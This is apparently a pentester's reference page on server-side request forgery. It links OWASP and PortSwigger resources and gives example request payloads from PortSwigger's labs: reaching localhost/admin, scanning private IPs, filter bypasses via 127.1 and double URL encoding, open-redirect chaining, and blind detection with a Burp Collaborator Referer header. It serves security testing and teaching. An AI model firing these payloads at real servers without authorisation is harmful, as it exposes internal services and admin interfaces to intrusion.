Server-Side Request Forgery (SSRF)

Server-side request forgery (also known as SSRF) is a web security vulnerability that allows an attacker to induce the server-side application to make HTTP requests to an arbitrary domain of the attacker’s choosing.

Testing for Server-Side Request Forgery (OWASP, WSTG-INPV-19)
Server-Side Request Forgery Prevention Cheat Sheet (OWASP)
Server-side request forgery (SSRF) (PortSwigger)
Evasion techniques (HackTricks)
SVG SSRFs and saga of bypasses (InfoSec Writeups)
Cloud SSRF (HackTricks)

Vulnerability description for reporting available in VulnDB (GitHub)

See labs WebSecurityAcademy (PortSwigger) – Server-side request forgery (SSRF).

See Bypassing URL/Domain/IP Formats.

Use the URL validation bypass cheat sheet (PortSwigger)!

Testing SSRF

Basic SSRF

POST /product/stock HTTP/1.0
...

stockApi=http://stock.weliketoshop.net:8080/product/stock/check%3FproductId%3D6%26storeId%3D1

Accessing localhost

POST /product/stock HTTP/1.1
...

stockApi=http://localhost/admin

Accessing another back-end system

Send the request to the Intruder module and make the IP address the varying part to scan the network for port 8080.

POST /product/stock HTTP/1.1
...

stockApi=http://<PRIVATE IP>:8080

SSRF with blacklist-based input filter

Example from the labs WebSecurityAcademy (PortSwigger) – Server-side request forgery (SSRF), use 127.1 to bypass filter on localhost, use double URL encoding (use Hackvertor) to bypass restriction on “admin”.

POST /product/stock HTTP/1.1
...

stockApi=http%3A%2F%2F127.1/<@replace('%','%25')><@urlencode_all>admin/<@/urlencode_all><@/replace>

SSRF with filter bypass via open redirection vulnerability

Example: if you find an Open Redirect vulnerability, use it to access internal admin interface with the SSRF.

POST /product/stock HTTP/1.1
...

stockApi=<@urlencode>/product/nextProduct?currentProductId=1&path=http://192.168.0.12:8080/admin<@/urlencode>

Blind SSRF with out-of-band detection

Try injecting the Burp Collaborator URL in the Referer HTTP header value. Check in the Burp Collaborator if a request is received.

Referer: https://<BURP COLLABORATOR ID>.oastify.com/

See lab Blind SSRF with Shellshock exploitation.

Install the Collaborator Everywhere extension for Burp Suite.
Add the target to Burp Suite’s target scope, so that Collaborator Everywhere will target it.
Navigate the webapp.
In the Target tab, new issues will be create for the vulnerable URL, for example:
- Collaborator Pingback (HTTP): Referer
- Collaborator Pingback (HTTP): User-Agent